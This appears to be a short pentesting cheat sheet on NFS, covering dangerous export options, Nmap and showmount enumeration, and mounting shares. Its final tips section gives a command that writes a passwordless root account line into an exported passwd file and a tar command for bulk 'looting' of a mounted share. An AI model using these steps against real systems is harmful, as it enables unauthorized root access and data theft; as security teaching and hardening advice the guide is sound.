NFS

NFS Security & Exploitation Guide

1. About NFS

Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems. Its purpose is to allow systems to:

  • Access remote file systems over a network as if they were local.

  • Provide file sharing primarily between Linux and Unix systems (not directly compatible with SMB).

Configuration File:

  • /etc/exports defines which directories are shared and the permissions granted to clients.

Default Ports:

  • RPC portmapper: 111/TCP & UDP

  • NFS service: 2049/TCP & UDP


2. Dangerous NFS Export Settings

Some NFS configurations can be insecure and lead to privilege escalation or unauthorized access:

  • rw → Grants read & write permissions.

  • insecure → Allows connections from ports >1024 (less trusted).

  • nohide → Exports nested filesystems automatically.

  • no_root_squashCritical risk: root users on clients retain root privileges on the NFS share (can create files owned by UID/GID 0).

Best Practice: Always avoid no_root_squash in production environments.


3. Enumeration & Exploitation

Nmap Enumeration

Use Nmap NSE scripts to fingerprint NFS:

sudo nmap -sV -p111,2049 --script nfs* 192.0.2.15

Show Available NFS Shares

showmount -e 192.0.2.15

Example output:

Export list for 192.0.2.15:
/srv/nfs_share *

4. Mounting & Unmounting NFS Shares

Mount a Share

mkdir target-NFS
sudo mount -t nfs 192.0.2.15:/srv/nfs_share ./target-NFS/ -o nolock

Unmount a Share

sudo umount ./target-NFS

5. Tips & Tricks for Pentesters

  • Privilege Escalation via no_root_squash If enabled, create a file owned by root on your local system, then copy it to the mounted share:

    echo "hacked::0:0::/root:/bin/bash" > ./target-NFS/passwd

    This could allow creation of root accounts if /etc/passwd is exported.

  • Recursive Share Search Check for nested exports using findmnt or mounting multiple shares.

  • Quick Looting with tar Instead of downloading files individually:

    cd ./target-NFS
    tar -cvf loot.tar *

Last updated